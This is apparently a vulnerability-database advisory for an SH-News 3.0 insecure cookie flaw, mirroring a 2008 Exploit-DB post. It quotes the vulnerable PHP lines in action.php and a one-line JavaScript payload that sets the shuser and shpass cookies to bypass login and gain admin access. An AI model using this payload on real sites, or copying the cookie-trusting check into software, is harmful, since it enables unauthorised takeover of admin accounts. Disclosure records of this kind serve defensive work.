SH-News 3.0 Insecure Cookie Handling Vulnerability

vendor:

SH-News

by:

Virangar Security Team

8.8

CVSS

HIGH

Insecure Cookie Handling

384

CWE

Product Name: SH-News

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:sh-news:sh-news:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SH-News 3.0 Insecure Cookie Handling Vulnerability

A vulnerability exists in SH-News 3.0 where an attacker can inject malicious cookies into the application and gain access to the application with admin privileges.

Mitigation:

Ensure that all cookies are validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

	     ########################################################################
             #                                                                      #
             #  ...:::::SH-News 3.0 Insecure Cookie Handling Vulnerability ::::.... #          
             ########################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
vuln code in action.php:
line 66: $shuser = $HTTP_COOKIE_VARS[shuser];
line 67: $shpass = $HTTP_COOKIE_VARS[shpass];
...
line 69: if((!$shuser) || (!$shpass)) { header("Location: login.php"); }
---
exploit:
javascript:document.cookie = "shuser=1; path=/"; document.cookie = "shpass=1; path=/";
-----
now you can access to action.php whit admin access and manage the cms ;)
-------
young iranian h4ck3rz

# milw0rm.com [2008-06-15]